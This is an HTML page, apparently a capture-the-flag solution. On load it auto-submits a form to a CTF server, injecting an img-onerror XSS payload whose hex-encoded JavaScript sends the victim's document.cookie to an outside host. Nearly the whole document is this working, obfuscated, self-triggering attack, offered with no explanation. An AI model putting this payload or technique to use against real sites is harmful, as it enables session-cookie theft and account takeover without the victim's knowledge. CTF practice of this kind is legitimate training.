<!DOCTYPE html>
<html>
<head>
</head>
<body>
<form action="http://ctf.laptophackingcoffee.org:1337/dev.php" method="post">
  Message: <input type="text" name="message" id="m"><br>
  <input type="submit" value="Submit" id="s">
</form>
<script>
var open='<img src=x onerror="';
var close='"><'+'/img>';
document.getElementById('m').value=open+"\x76\x61\x72\x20\x78\x68\x72\x3D\x6E\x65\x77\x20\x58\x4D\x4C\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74\x28\x29\x3B\x78\x68\x72\x2E\x6F\x70\x65\x6E\x28\x27\x50\x4F\x53\x54\x27\x2C\x27\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x77\x77\x2E\x63\x74\x66\x2D\x73\x6F\x6C\x76\x65\x72\x2E\x68\x65\x72\x6F\x6B\x75\x61\x70\x70\x2E\x63\x6F\x6D\x2F\x69\x6D\x61\x67\x65\x27\x2C\x74\x72\x75\x65\x29\x3B\x78\x68\x72\x2E\x73\x65\x6E\x64\x28\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x63\x6F\x6F\x6B\x69\x65\x29\x3B"+close;
document.getElementById('s').click();
</script>
<noscript>You're missing out.</noscript>
</body>
</html>
